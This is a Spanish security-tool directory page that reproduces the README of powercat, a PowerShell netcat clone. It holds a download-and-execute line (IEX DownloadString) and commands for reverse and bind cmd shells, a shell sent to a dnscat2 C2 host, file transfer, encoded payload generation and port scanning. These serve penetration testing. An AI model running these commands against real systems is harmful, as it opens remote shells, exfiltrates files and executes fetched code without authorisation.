Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
powercat — netshell incluye todas las características en PowerShell versión 2 | Kitploit
Herramientas/GitHubGitHub/besimorhino/powercat
Generación de PayloadsEscaneo de PuertosSeguridad de RedesPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso RemotoAnálisis de DNS
GitHubbesimorhino/powercat

powercat

netshell incluye todas las características en PowerShell versión 2

Ver Repositorio
2.4k485hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

powercat

Netcat: La versión de PowerShell. (Compatible con PowerShell versión 2 y posteriores)

Instalación

powercat es una función de PowerShell. Primero debes cargar la función antes de poder ejecutarla. Puedes colocar uno de los siguientes comandos en tu perfil de PowerShell para que powercat se cargue automáticamente al iniciar PowerShell.

root@kitploit:~
Load The Function From Downloaded .ps1 File:
    . .\powercat.ps1
Load The Function From URL:
    IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Parámetros:

root@kitploit:~
-l      Escuchar una conexión.                           [Switch]
-c      Conectar a un listener.                          [String]
-p      El puerto para conectar o escuchar.               [String]
-e      Ejecutar. (GAPING_SECURITY_HOLE)                  [String]
-ep     Ejecutar PowerShell.                              [Switch]
-r      Retransmitir. Formato: "-r tcp:10.1.1.1:443"      [String]
-u      Transferir datos por UDP.                         [Switch]
-dns    Transferir datos por DNS (dnscat2).               [String]
-dnsft  Umbral de fallos DNS.                             [int32]
-t      Opción de tiempo de espera. Valor predeterminado: 60  [int32]
-i      Entrada: ruta de archivo (cadena), arreglo de bytes o cadena. [object]
-o      Tipo de salida de consola: "Host", "Bytes" o "String" [String]
-of     Ruta del archivo de salida.                      [String]
-d      Desconectar después de conectar.                  [Switch]
-rep    Repetidor. Reiniciar después de desconectar.      [Switch]
-g      Generar payload.                                 [Switch]
-ge     Generar payload codificado.                      [Switch]
-h      Mostrar mensaje de ayuda.                        [Switch]

Conexiones Básicas

Por defecto, powercat lee la entrada desde la consola y escribe la salida en la consola usando write-host. Puedes cambiar el tipo de salida a 'Bytes' o 'String' con -o.

root@kitploit:~
Basic Client:
    powercat -c 10.1.1.1 -p 443
Basic Listener:
    powercat -l -p 8000
Basic Client, Output as Bytes:
    powercat -c 10.1.1.1 -p 443 -o Bytes

Transferencia de Archivos

powercat se puede usar para transferir archivos en ambos sentidos usando -i (Input) y -of (Output File).

root@kitploit:~
Send File:
    powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Recieve File:
    powercat -l -p 8000 -of C:\inputfile

Shells

powercat se puede usar para enviar y servir shells. Especifica un ejecutable con -e, o usa -ep para ejecutar PowerShell.

root@kitploit:~
Serve a cmd Shell:
    powercat -l -p 443 -e cmd
Send a cmd Shell:
    powercat -c 10.1.1.1 -p 443 -e cmd
Serve a shell which executes powershell commands:
    powercat -l -p 443 -ep

DNS y UDP

powercat admite más que solo enviar datos por TCP. Especifica -u para habilitar el modo UDP. También se pueden enviar datos a un servidor dnscat2 con -dns. Asegúrate de agregar "-e open --no-cache" al ejecutar el servidor dnscat2.

root@kitploit:~
Send Data Over UDP:
    powercat -c 10.1.1.1 -p 8000 -u
    powercat -l -p 8000 -u
Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1:
    powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows:
    powercat -dns c2.example.com -e cmd

Relés

Los relés en powercat funcionan igual que los relés tradicionales de netcat, pero no necesitas crear un archivo ni iniciar un segundo proceso. También puedes retransmitir datos entre conexiones de diferentes protocolos.

root@kitploit:~
TCP Listener to TCP Client Relay:
    powercat -l -p 8000 -r tcp:10.1.1.16:443
TCP Listener to UDP Client Relay:
    powercat -l -p 8000 -r udp:10.1.1.16:53
TCP Listener to DNS Client Relay
    powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
TCP Listener to DNS Client Relay using the Windows Default DNS Server
    powercat -l -p 8000 -r dns:::c2.example.com
TCP Client to Client Relay
    powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
TCP Listener to Listener Relay
    powercat -l -p 8000 -r tcp:9000

Generar Payloads

Los payloads que realizan una acción específica se pueden generar usando -g (Generate Payload) y -ge (Generate Encoded Payload). Los payloads codificados se pueden ejecutar con powershell -E. Puedes usarlos si no deseas usar todo powercat.

root@kitploit:~
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
    powercat -c 10.1.1.15 -p 443 -e cmd -g
Generate a bind tcp encoded command which listens on port 8000:
    powercat -l -p 8000 -e cmd -ge

Uso Variado

powercat también se puede usar para realizar escaneos de puertos e iniciar servidores persistentes.

root@kitploit:~
Basic TCP Port Scanner:
    (21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}
Start A Persistent Server That Serves a File:
    powercat -l -p 443 -i C:\inputfile -rep
Descargar herramienta